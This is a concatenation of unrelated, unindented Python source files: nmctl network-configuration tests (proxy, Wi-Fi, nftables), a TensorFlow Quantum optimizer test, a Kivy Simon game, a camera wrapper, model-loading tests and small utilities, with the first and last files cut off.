if not os.path.exists("/etc/sysconfig/"):
os.mkdir("/etc/sysconfig/")
f = open("/etc/sysconfig/proxy", "w")
f.write("PROXY_ENABLED=\"no\"\nHTTP_PROXY=""\nHTTPS_PROXY=""\nNO_PROXY=\"localhost, 127.0.0.1\"\n")
f.close()
subprocess.check_call(['nmctl', 'set-proxy', 'enable', 'yes', 'http', 'http://test.com:123', 'https', 'https://test.com:123'])
dictionary = {}
file = open("/etc/sysconfig/proxy")
lines = file.read().split('\n')
for line in lines:
if line == '':
continue
pair = line.split('=')
dictionary[pair[0].strip('\'\'\"\"')] = pair[1].strip('\'\'\"\"')
assert(dictionary["HTTP_PROXY"] == "http://test.com:123")
assert(dictionary["HTTPS_PROXY"] == "https://test.com:123")
assert(dictionary["PROXY_ENABLED"] == "yes")
subprocess.check_call(['nmctl', 'set-proxy', 'enable', 'yes', 'http', 'http://test.com:123', 'ftp', 'https://test.com123'])
class TestWifiWPASupplicantConf:
yaml_configs = [
"name-password-wifi-dhcp.yaml",
"name-password-wifi-static.yaml",
"wpa-eap-tls-wifi.yaml",
"wpa-eap-ttls.yaml",
]
def copy_yaml_file_to_netmanager_yaml_path(self, config_file):
shutil.copy(os.path.join(network_config_manager_ci_yaml_path, config_file), network_config_manager_yaml_config_path)
def remove_units_from_netmanager_yaml_path(self):
for config_file in self.yaml_configs:
if (os.path.exists(os.path.join(network_config_manager_yaml_config_path, config_file))):
os.remove(os.path.join(network_config_manager_yaml_config_path, config_file))
def teardown_method(self):
remove_units_from_netword_unit_path()
self.remove_units_from_netmanager_yaml_path()
def test_wifi_wpa_supplicant_name_password_dhcp(self):
self.copy_yaml_file_to_netmanager_yaml_path('name-password-wifi-dhcp.yaml')
subprocess.check_call(['nmctl', 'apply-yaml-config'])
assert(unit_exits('10-wlan1.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-wlan1.network'))
assert(parser.get('Match', 'Name') == 'wlan1')
assert(parser.get('Network', 'DHCP') == 'yes')
assert(wifi_wpa_supplilant_conf_exits() == True)
network = read_wpa_supplicant_conf(network_config_manager_wpa_supplilant_conf_file)
assert(network["ssid"] == "network_ssid_name1")
assert(network["password"] == "test123")
def test_wifi_wpa_supplicant_name_password_static(self):
self.copy_yaml_file_to_netmanager_yaml_path('name-password-wifi-static.yaml')
subprocess.check_call(['nmctl', 'apply-yaml-config'])
assert(unit_exits('10-wlan1.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-wlan1.network'))
assert(parser.get('Match', 'Name') == 'wlan1')
assert(parser.get('Route', 'Gateway') == '192.168.1.1/24')
assert(parser.get('Route', 'GatewayOnlink') == 'yes')
assert(wifi_wpa_supplilant_conf_exits() == True)
network = read_wpa_supplicant_conf(network_config_manager_wpa_supplilant_conf_file)
if network is None:
assert(False)
assert(network["ssid"] == "network_ssid_name1")
assert(network["password"] == "test123")
@pytest.mark.skip(reason="skipping")
def test_wifi_wpa_supplicant_eap_tls_dhcp(self):
self.copy_yaml_file_to_netmanager_yaml_path('wpa-eap-tls-wifi.yaml')
subprocess.check_call(['nmctl', 'apply-yaml-config'])
assert(unit_exits('10-wlan1.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-wlan1.network'))
assert(parser.get('Match', 'Name') == 'wlan1')
assert(parser.get('Network', 'DHCP') == 'yes')
assert(wifi_wpa_supplilant_conf_exits() == True)
network = read_wpa_supplicant_conf(network_config_manager_wpa_supplilant_conf_file)
if network is None:
assert(False)
assert(network["ssid"] == "network_ssid_name1")
assert(network["eap"] == "PEAP")
assert(network["identity"] == "[email protected]")
assert(network["anonymous_identity"] == "@test.example.com")
assert(network["ca_cert"] == "/etc/ssl/cust-cacrt.pem")
assert(network["client_cert"] == "/etc/ssl/cust-crt.pem")
assert(network["private_key"] == "/etc/ssl/cust-key.pem")
assert(network["private_key_passwd"] == "QZTrSEtq:h_d.W7_")
def test_wifi_wpa_supplicant_eap_ttls_dhcp(self):
self.copy_yaml_file_to_netmanager_yaml_path('wpa-eap-ttls.yaml')
subprocess.check_call(['nmctl', 'apply-yaml-config'])
assert(unit_exits('10-wlan0.network') == True)
parser = configparser.ConfigParser()
parser.read(os.path.join(networkd_unit_file_path, '10-wlan0.network'))
assert(parser.get('Match', 'Name') == 'wlan0')
assert(parser.get('Network', 'DHCP') == 'yes')
assert(wifi_wpa_supplilant_conf_exits() == True)
network = read_wpa_supplicant_conf(network_config_manager_wpa_supplilant_conf_file)
if network is None:
assert(False)
assert(network["ssid"] == "network_ssid_name1")
assert(network["identity"] == "[email protected]")
assert(network["anonymous_identity"] == "@test.example.com")
assert(network["password"] == "test123")
class TestNFTable(unittest.TestCase):
def tearDown(self):
subprocess.call(['nft', 'delete', 'table', 'testtable99'])
def test_nmctl_add_table(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
output = subprocess.check_output(['nft', 'list', 'tables'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'table ip testtable99')
def test_nmctl_show_table(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
output = subprocess.check_output(['nmctl', 'show-nft-tables'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
def test_nmctl_delete_table(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
output = subprocess.check_output(['nft', 'list', 'tables'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'table ip testtable99')
subprocess.check_call(['nmctl', 'delete-nft-table', 'ipv4', 'testtable99'])
output = subprocess.check_output(['nft', 'list', 'tables'], universal_newlines=True).rstrip()
print(output)
self.assertNotRegex(output, 'table ip testtable99')
def test_nmctl_add_chain(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
subprocess.check_call(['nmctl', 'add-nft-chain', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nft', 'list', 'table', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
self.assertRegex(output, 'testchain99')
def test_nmctl_show_chain(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
subprocess.check_call(['nmctl', 'add-nft-chain', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nmctl', 'show-nft-chains', 'ipv4', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
self.assertRegex(output, 'testchain99')
def test_nmctl_delete_chain(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
subprocess.check_call(['nmctl', 'add-nft-chain', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nmctl', 'show-nft-chains', 'ipv4', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
self.assertRegex(output, 'testchain99')
subprocess.check_call(['nmctl', 'delete-nft-chain', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nft', 'list', 'table', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
self.assertNotRegex(output, 'testchain99')
def test_nmctl_add_rule_tcp_accept(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
subprocess.check_call(['nmctl', 'add-nft-chain', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nmctl', 'show-nft-chains', 'ipv4', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
self.assertRegex(output, 'testchain99')
subprocess.check_call(['nmctl', 'add-nft-rule', 'ipv4', 'testtable99', 'testchain99', 'tcp', 'dport', '9999', 'accept'])
output = subprocess.check_output(['nft', 'list', 'table', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'tcp dport 9999 counter packets 0 bytes 0 accept')
def test_nmctl_add_rule_tcp_drop(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
subprocess.check_call(['nmctl', 'add-nft-chain', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nmctl', 'show-nft-chains', 'ipv4', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
self.assertRegex(output, 'testchain99')
subprocess.check_call(['nmctl', 'add-nft-rule', 'ipv4', 'testtable99', 'testchain99', 'tcp', 'dport', '9999', 'drop'])
output = subprocess.check_output(['nft', 'list', 'table', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'tcp dport 9999 counter packets 0 bytes 0 drop')
def test_nmctl_add_rule_tcp_drop_sport(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
subprocess.check_call(['nmctl', 'add-nft-chain', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nmctl', 'show-nft-chains', 'ipv4', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
self.assertRegex(output, 'testchain99')
subprocess.check_call(['nmctl', 'add-nft-rule', 'ipv4', 'testtable99', 'testchain99', 'tcp', 'sport', '9999', 'drop'])
output = subprocess.check_output(['nft', 'list', 'table', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'tcp sport 9999 counter packets 0 bytes 0 drop')
def test_nmctl_add_rule_tcp_drop_accept_sport(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
subprocess.check_call(['nmctl', 'add-nft-chain', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nmctl', 'show-nft-chains', 'ipv4', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
self.assertRegex(output, 'testchain99')
subprocess.check_call(['nmctl', 'add-nft-rule', 'ipv4', 'testtable99', 'testchain99', 'tcp', 'sport', '9999', 'accept'])
output = subprocess.check_output(['nft', 'list', 'table', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'tcp sport 9999 counter packets 0 bytes 0 accept')
def test_nmctl_add_rule_udp_accept_sport(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
subprocess.check_call(['nmctl', 'add-nft-chain', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nmctl', 'show-nft-chains', 'ipv4', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
self.assertRegex(output, 'testchain99')
subprocess.check_call(['nmctl', 'add-nft-rule', 'ipv4', 'testtable99', 'testchain99', 'udp', 'sport', '9999', 'accept'])
output = subprocess.check_output(['nft', 'list', 'table', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'udp sport 9999 counter packets 0 bytes 0 accept')
def test_nmctl_add_rule_udp_drop_dport(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
subprocess.check_call(['nmctl', 'add-nft-chain', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nmctl', 'show-nft-chains', 'ipv4', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
self.assertRegex(output, 'testchain99')
subprocess.check_call(['nmctl', 'add-nft-rule', 'ipv4', 'testtable99', 'testchain99', 'udp', 'dport', '9999', 'drop'])
output = subprocess.check_output(['nft', 'list', 'table', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'udp dport 9999 counter packets 0 bytes 0 drop')
def test_nmctl_add_rule_udp_accept_dport(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
subprocess.check_call(['nmctl', 'add-nft-chain', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nmctl', 'show-nft-chains', 'ipv4', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
self.assertRegex(output, 'testchain99')
subprocess.check_call(['nmctl', 'add-nft-rule', 'ipv4', 'testtable99', 'testchain99', 'udp', 'dport', '9999', 'accept'])
output = subprocess.check_output(['nft', 'list', 'table', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'udp dport 9999 counter packets 0 bytes 0 accept')
def test_nmctl_delete_rule(self):
subprocess.check_call(['nmctl', 'add-nft-table', 'ipv4', 'testtable99'])
subprocess.check_call(['nmctl', 'add-nft-chain', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nmctl', 'show-nft-chains', 'ipv4', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'testtable99')
self.assertRegex(output, 'testchain99')
subprocess.check_call(['nmctl', 'add-nft-rule', 'ipv4', 'testtable99', 'testchain99', 'udp', 'dport', '9999', 'accept'])
output = subprocess.check_output(['nft', 'list', 'table', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertRegex(output, 'udp dport 9999 counter packets 0 bytes 0 accept')
subprocess.check_call(['nmctl', 'delete-nft-rule', 'ipv4', 'testtable99', 'testchain99'])
output = subprocess.check_output(['nft', 'list', 'table', 'testtable99'], universal_newlines=True).rstrip()
print(output)
self.assertNotRegex(output, 'udp dport 9999 counter packets 0 bytes 0 accept')
def setUpModule():
if not os.path.exists(network_config_manager_yaml_config_path):
os.makedirs(network_config_manager_yaml_config_path)
if not os.path.exists(network_config_manager_yaml_config_path):
shutil.mkdirs(network_config_manager_yaml_config_path)
def tearDownModule():
if os.path.exists(network_config_manager_ci_path):
shutil.rmtree(network_config_manager_ci_path)
|
python
|
from project.appliances.appliance import Appliance
class TV(Appliance):
def __init__(self):
self.cost = 1.5
super().__init__(self.cost)
|
python
|
# Copyright 2020 The TensorFlow Quantum Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test module for tfq.python.optimizers.rotosolve_minimizer optimizer."""
# Remove PYTHONPATH collisions for protobuf.
# pylint: disable=wrong-import-position
import sys
NEW_PATH = [x for x in sys.path if 'com_google_protobuf' not in x]
sys.path = NEW_PATH
# pylint: enable=wrong-import-position
from operator import mul
from functools import reduce
import numpy as np
import tensorflow as tf
from absl.testing import parameterized
import cirq
import sympy
from tensorflow_quantum.python.layers.high_level import pqc
from tensorflow_quantum.python import util
from tensorflow_quantum.python.optimizers import rotosolve_minimizer
def loss_function_with_model_parameters(model, loss, train_x, train_y):
"""Create a new function that assign the model parameter to the model
and evaluate its value.
Args:
model : an instance of `tf.keras.Model` or its subclasses.
loss : a function with signature loss_value = loss(pred_y, true_y).
train_x : the input part of training data.
train_y : the output part of training data.
Returns:
A function that has a signature of:
loss_value = f(model_parameters).
"""
# obtain the shapes of all trainable parameters in the model
shapes = tf.shape_n(model.trainable_variables)
count = 0
sizes = []
# Record the shape of each parameter
for shape in shapes:
n = reduce(mul, shape)
sizes.append(n)
count += n
# Function accept the parameter and evaluate model
@tf.function
def func(params):
"""A function that can be used by tfq.optimizer.rotosolve_minimize.
Args:
params [in]: a 1D tf.Tensor.
Returns:
Loss function value
"""
# update the parameters of the model
start = 0
for i, size in enumerate(sizes):
model.trainable_variables[i].assign(
tf.reshape(params[start:start + size], shape))
start += size
# evaluate the loss
loss_value = loss(model(train_x, training=True), train_y)
return loss_value
return func
class RotosolveMinimizerTest(tf.test.TestCase, parameterized.TestCase):
"""Tests for the rotosolve optimization algorithm."""
def test_function_optimization(self):
"""Optimize a simple sinusoid function."""
n = 10 # Number of parameters to be optimized
coefficient = tf.random.uniform(shape=[n])
min_value = -tf.math.reduce_sum(tf.abs(coefficient))
func = lambda x: tf.math.reduce_sum(tf.sin(x) * coefficient)
result = rotosolve_minimizer.minimize(func, np.random.random(n))
self.assertAlmostEqual(func(result.position), min_value)
self.assertAlmostEqual(result.objective_value, min_value)
self.assertTrue(result.converged)
self.assertLess(result.num_iterations,
50) # 50 is the default max iteration
def test_nonlinear_function_optimization(self):
"""Test to optimize a non-linear function.
A non-linear function cannot be optimized by rotosolve,
therefore the optimization must never converge.
"""
func = lambda x: x[0]**2 + x[1]**2
result = rotosolve_minimizer.minimize(func,
tf.random.uniform(shape=[2]))
self.assertFalse(result.converged)
self.assertEqual(result.num_iterations,
50) # 50 is the default max iteration
def test_keras_model_optimization(self):
"""Optimizate a PQC based keras model."""
x = np.asarray([
[0, 0],
[0, 1],
[1, 0],
[1, 1],
], dtype=float)
y = np.asarray([[-1], [1], [1], [-1]], dtype=np.float32)
def convert_to_circuit(input_data):
"""Encode into quantum datapoint."""
values = np.ndarray.flatten(input_data)
qubits = cirq.GridQubit.rect(1, 2)
circuit = cirq.Circuit()
for i, value in enumerate(values):
if value:
circuit.append(cirq.X(qubits[i]))
return circuit
x_circ = util.convert_to_tensor([convert_to_circuit(x) for x in x])
# Create two qubits
q0, q1 = cirq.GridQubit.rect(1, 2)
# Create an anzatz on these qubits.
a, b = sympy.symbols('a b') # parameters for the circuit
circuit = cirq.Circuit(
cirq.rx(a).on(q0),
cirq.ry(b).on(q1), cirq.CNOT(control=q0, target=q1))
# Build the Keras model.
model = tf.keras.Sequential([
# The input is the data-circuit, encoded as a tf.string
tf.keras.layers.Input(shape=(), dtype=tf.string),
# The PQC layer returns the expected value of the
# readout gate, range [-1,1].
pqc.PQC(circuit, cirq.Z(q1)),
])
# Initial guess of the parameter from random number
result = rotosolve_minimizer.minimize(
loss_function_with_model_parameters(model, tf.keras.losses.Hinge(),
x_circ, y),
tf.random.uniform(shape=[2]) * 2 * np.pi)
self.assertAlmostEqual(result.objective_value, 0)
self.assertTrue(result.converged)
if __name__ == "__main__":
tf.test.main()
|
python
|
from importlib import import_module
from importlib import resources
PLUGINS = dict()
def register_plugin(func):
"""Decorator to register plug-ins"""
name = func.__name__
PLUGINS[name] = func
return func
def __getattr__(name):
"""Return a named plugin"""
try:
return PLUGINS[name]
except KeyError:
_import_plugins()
if name in PLUGINS:
return PLUGINS[name]
else:
raise AttributeError(
f"module {__name__!r} has no attribute {name!r}"
) from None
def __dir__():
"""List available plug-ins"""
_import_plugins()
return list( PLUGINS.keys() )
def _import_plugins():
"""Import all resources to register plug-ins"""
for name in resources.contents(__name__):
if name.endswith(".py"):
import_module(f"{__name__}.{name[:-3]}")
|
python
|
# import os
# os.environ["KIVY_WINDOW"] = "sdl2"
# uncomment the above lines to run on raspberrypi like it runs on windows.
import kivy
kivy.require('1.9.1')
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.clock import Clock
from time import sleep, time
from random import randint
from functools import partial
import threading
class SimonBoxLayout(BoxLayout):
""" Game logic goes inside this class."""
# when game is launched, start blinking new game button
def __init__(self):
super().__init__()
self.set_game_variables(init=True)
self.custom_animate_button(self.restart_button, "blink_loop")
# binded to newgame button
def start(self, *args):
''' start a new game thread '''
threading.Thread(target=self.setup, args=args).start()
# setup a new game
def setup(self, r, b, g, y):
''' Receives colored buttons objects.
Sets up all variables and starts game loop.'''
# blink once animation for start game button after clicked
self.custom_animate_button(self.restart_button, "down")
# handle player clicking "new game" before game is over
if not self.players_turn:
return
elif self.game_on:
self.aborted = True
else:
self.aborted = False
# init/reset variables for new game
self.set_game_variables(r, b, g, y)
# game starting animation
self.game_starting()
# setup game screen
self.update_current()
# start game loop
self.game_on = True
self.newgame()
# init/reset all game variables
def set_game_variables(self, *args, init=False):
''' information about the game is stored in these variables '''
# used to continue looping game
self.game_on = False
# kivy button objects for the colored squares
self.objcs = [i for i in args]
# starting lenght of the sequence
self.starting_size = 1
# random new sequence that player will try replicate
self.rand_list = [randint(0, 3) for i in range(self.starting_size - 1)]
# player current attempt to replicate sequence
self.player_moves = []
# current biggest successful sequence replicate
self.current_streak = 0
# current longest registered sequence replicate
self.longest_streak = self.load_record()
# in seconds, how long before next blinking square
self.speed = 1
# used to lock player input while showing sequence
self.players_turn = init
# if this game broke previous record
self.new_record_flag = False
# kill_thread_flag is used to kill python loops after game closes
self.kill_thread_flag = threading.Event()
# game loop
def newgame(self):
while self.game_on:
# check if program was closed
if self.kill_thread_flag.is_set():
# if yes kill loop
return
self.output_pattern()
self.intake_pattern()
self.update_current()
self.announce_gameover()
# schedule the sequence
def output_pattern(self):
# lock player input while sequence being shown
self.change_turn(turn="computer")
# add new value to sequence
self.rand_list.append(randint(0, 3))
# time buffer between events in order to not move too fast for humans:
buff = self.update_self_speed()
sleep(5 * buff)
# list of functions to blink (dim/turnon) each button in sequence
dim_list = []
turnon_list = []
for i in self.rand_list:
obj = self.objcs[i]
partial_func1 = partial(self.showpattern_dim, obj)
partial_func2 = partial(self.showpattern_high, obj)
dim_list.append(partial_func1)
turnon_list.append(partial_func2)
# scheduling the time of execution of each function,
# in order to create the sequence flow.
# the buffer is used to create the blink effect
for i in range(len(dim_list)):
# schedule turning button off
Clock.schedule_once(dim_list[i], i * (self.speed) + buff)
# schedule turning button back on
Clock.schedule_once(turnon_list[i], (i + 1) * (self.speed))
# allow player's input after entire sequence was shown
unlock_player = partial(self.change_turn, **{"turn": "player"})
Clock.schedule_once(unlock_player, (i + 1) * (self.speed))
# get player's input
def intake_pattern(self, *args):
# reset the players input from previous round
self.player_moves = []
# wait for players turn
while not self.players_turn:
# check if program was closed
if self.kill_thread_flag.is_set() or not self.game_on:
# if yes kill loop
return
# sleep and wait to check again
sleep(0.3)
# Player button clicks will append values to self.player_moves.
# This loop will check and make sure every click matches sequence.
# Will exit when player number of inputs equals the lenght of the
# sequence.
while True:
# check if program was closed or new game was pressed
if self.kill_thread_flag.is_set() or not self.game_on:
# if yes kill loop
return
# check if lists are equal
counter = 0
for x, y in zip(self.player_moves, self.rand_list):
if x != y:
# if different, declare game over
self.game_on = False
self.aborted = False
return
counter += 1
# return when player has reproduced the entire sequence
if counter == len(self.rand_list):
return
# wait a little before continuing loop
sleep(0.1)
# update screen after every turn
def update_current(self):
# define current streak
if not self.game_on:
self.current_streak = (len(self.rand_list) - 1 if
len(self.rand_list) > 0 else 0)
else:
self.current_streak = len(self.rand_list)
# if your streak is bigger than your record, update record
if self.current_streak > self.longest_streak:
self.new_record_flag = True
self.longest_streak = self.current_streak
# update the screen with your total streak and record
streak = 'Current streak: ' + str(self.current_streak)
record = 'All time best: ' + str(self.longest_streak)
self.streak.text = streak
self.record.text = record
# if game is over, announce it
def announce_gameover(self):
# if game was aborted skip announcing
if self.aborted:
return
# if there was a new record, update file, and congratulate
if self.new_record_flag:
with open("kivy.dll", mode="w") as f:
f.write(str(hex(self.current_streak)))
announce = "GAMEOVER\nCongratz!\nYour new record is "
announce += str(self.current_streak) + " repetitions."
else:
announce = "GAMEOVER\nYour record remains "
announce += str(self.longest_streak) + " repetitions."
self.turn.color = [1, 0, 0, 1]
self.turn.text = (announce)
# dim button (recieves *args because scheduling passes extra arg "dt")
def showpattern_dim(self, obj, *args):
obj.background_color[-1] = 0.2
# brighten button
def showpattern_high(self, obj, *args):
obj.background_color[-1] = 1
# update if it's player turn to play or not
def change_turn(self, *args, turn, **kwargs):
# make output message yellow
self.turn.color = [1, 1, 0, 1]
if turn == "player":
self.players_turn = True
self.turn.text = "YOUR TURN!"
elif turn == "computer":
self.players_turn = False
self.turn.text = ("REPEAT THIS SEQUENCE")
else:
raise ValueError("change turn error")
# load record from storage file
def load_record(self):
try:
with open("kivy.dll") as f:
data = f.readline()
return int(data, 16)
except FileNotFoundError:
with open("kivy.dll", mode="w") as f:
f.write("0")
return 0
# bound to colored buttons
def click_append(self, color_number):
# if its player turn, append to list else don't.
if self.players_turn and self.game_on:
self.player_moves.append(color_number)
elif not self.players_turn:
self.turn.color = [0 / 255, 95 / 255, 249 / 255, 1]
self.turn.text = "Not your turn yet!"
else:
pass
# increment speed with every move
def update_self_speed(self):
''' Updates the speed of the game in order to go faster as sequences get longer
Outputs the appropriate time buffer between blinks and other events
'''
self.speed = round(self.speed - self.speed / 10, 2)
self.speed = 0.4 if self.speed < 0.4 else self.speed
return round(self.speed / 10, 2)
# animate button so the user knows it was clicked
def custom_animate_button(self, button, high_or_low):
# turn button red when pressed
if high_or_low == "down":
button.color = [0 / 255, 95 / 255, 249 / 255, 1]
# turn yellow when released
elif high_or_low == "up":
def unpress(*args):
button.color = [1, 1, 0, 1]
Clock.schedule_once(unpress, 1)
# blinking effect when waiting for player to click
elif high_or_low == "blink_loop":
def blink(*args):
if self.game_on:
button.color = [1, 1, 0, 1]
elif button.color == [1, 1, 0, 1]:
button.color = [1, 0, 0, 1]
elif button.color == [1, 0, 0, 1]:
button.color = [1, 1, 0, 1]
for i in range(3600):
Clock.schedule_once(blink, i * 0.5)
else:
raise ValueError("Button state not recognized")
# game starting animation
def game_starting(self):
msg = "Starting game "
self.turn.color = [0 / 255, 95 / 255, 249 / 255, 1]
for i in range(5):
self.turn.text = msg
msg += ". "
sleep(0.2)
# .kv file must be <same name of this class without "App">.kv all lowercase
class SimonGameApp(App):
def on_stop(self):
self.root.kill_thread_flag.set()
def build(self):
return SimonBoxLayout()
myapp = SimonGameApp()
myapp.run()
|
python
|
import torch
import unseal.transformers_util as tutil
from unseal.hooks import HookedModel
def test_load_model():
model, tokenizer, config = tutil.load_from_pretrained('gpt2')
assert model is not None
assert tokenizer is not None
assert config is not None
def test_load_model_with_dir():
model, tokenizer, config = tutil.load_from_pretrained('gpt-neo-125M', model_dir='EleutherAI')
assert model is not None
assert tokenizer is not None
assert config is not None
def test_load_model_eleuther_without_dir():
model, tokenizer, config = tutil.load_from_pretrained('gpt-neo-125M')
assert model is not None
assert tokenizer is not None
assert config is not None
def test_load_model_with_low_mem():
model, tokenizer, config = tutil.load_from_pretrained('gpt2', low_cpu_mem_usage=True)
assert model is not None
assert tokenizer is not None
assert config is not None
def test_get_num_layers_gpt2():
model, *_ = tutil.load_from_pretrained('gpt2')
model = HookedModel(model)
assert tutil.get_num_layers(model, 'transformer->h') == 12
def test_get_num_layers_transformer():
model = torch.nn.Transformer(d_model=10, nhead=2, num_encoder_layers=0, num_decoder_layers=10)
model = HookedModel(model)
assert tutil.get_num_layers(model, 'decoder->layers')
|
python
|
import cv2
from image_manipulation import binarize_image, grayscale_image
class Camera(object):
"""
Class to take pictures.
:param width_size: camera's image width
:type width_size: int
:param height_size: camera's image height
:type height_size: int
:param input_cam_device: param to control camera's input
:type input_cam_device: int
:param height_param: param to set height on camera
:type height_param: int
:param width_param: param to set width on camera
:type width_param: int
:param mode: param to control type of image
:type mode: str
:param debug: param to enter debug mode
:type debug: bool
:param resize: param to control the image resizing
:type resize: float
"""
def __init__(self,
width_size=160,
height_size=90,
input_cam_device=0,
height_param=4,
width_param=3,
mode="pure",
debug=False,
resize=1.0):
self.cam = cv2.VideoCapture(input_cam_device)
self.cam.set(width_param, width_size)
self.cam.set(height_param, height_size)
assert mode == "pure" or mode == "green" or mode == "bin" or mode == "gray" # noqa
self.mode = mode
self.resize = resize
self.debug = debug
def save_image(self, path, img):
"""
Save image in path "path".
:param path: path to save image
:type path: str
:param img: image
:type img: np.ndarray
"""
cv2.imwrite(path, img)
def take_picture(self):
"""
Take picture according to the mode param.
:rtype: np.ndarray
"""
if self.mode == "pure":
return self.take_picture_rgb()
elif self.mode == "green":
return self.take_picture_green()
elif self.mode == "bin":
return self.take_picture_bin()
elif self.mode == "gray":
return self.take_picture_gray()
def take_picture_rgb(self):
"""
Take picture with no transformation.
:return: resized image
:rtype: np.ndarray, np.ndarray
"""
_, img = self.cam.read()
res = cv2.resize(img, (0, 0), fx=self.resize, fy=self.resize)
if self.debug:
return res, img
return res
def take_picture_gray(self):
"""
Take grayscale picture.
:return: gray and resized image
:rtype: np.ndarray, np.ndarray
"""
_, orig = self.cam.read()
img = cv2.resize(orig, (0, 0), fx=self.resize, fy=self.resize)
img = grayscale_image(img)
if self.debug:
return img, orig
return img
def take_picture_bin(self):
"""
Take binarized picture.
:return: binary and resized image
:rtype: np.ndarray, np.ndarray
"""
_, orig = self.cam.read()
img = cv2.resize(orig, (0, 0), fx=self.resize, fy=self.resize)
img = binarize_image(img)
if self.debug:
return img, orig
return img
def take_picture_green(self):
"""
Take picture with only the green channel.
:return: green and resized image
:rtype: np.ndarray, np.ndarray
"""
_, orig = self.cam.read()
img = cv2.resize(orig, (0, 0), fx=self.resize, fy=self.resize)
if self.debug:
return img[1], orig
return img[1]
|
python
|
#Passing a List
def greet(names):
for name in names:
msg=f"Hello, {name.title()}"
print(msg)
username=['alice','beerus','cyrus']
greet(username)
|
python
|
# coding:utf-8
# log utils
"""
切记: 不要重复创造日志对象,否则会重复打印
"""
# import os
from logging import (
handlers,
getLogger,)
from logging import Formatter as LoggingFormatter
from logging import StreamHandler as LoggingStreamHandler
from logging import FileHandler as LoggingFileHandler
from logging import ERROR as LOGGING_ERROR
from logging import DEBUG as LOGGING_DEBUG
__all__ = [
'set_logger'
]
CONSOLE_FORMATTER = '%(asctime)s [%(levelname)-6s] ➞ %(message)s'
FILE_FORMATTER = '%(asctime)s [%(levelname)-6s] at %(filename)s 出错函数%(funcName)s.%(lineno)d ↴\n %(message)s\n'
def set_logger(log_file_name,
console_log_level=LOGGING_DEBUG,
file_log_level=LOGGING_ERROR,
console_formatter=CONSOLE_FORMATTER,
file_formatter=FILE_FORMATTER,
logger_name='my_logger'):
# 创建一个logger,可以考虑如何将它封装
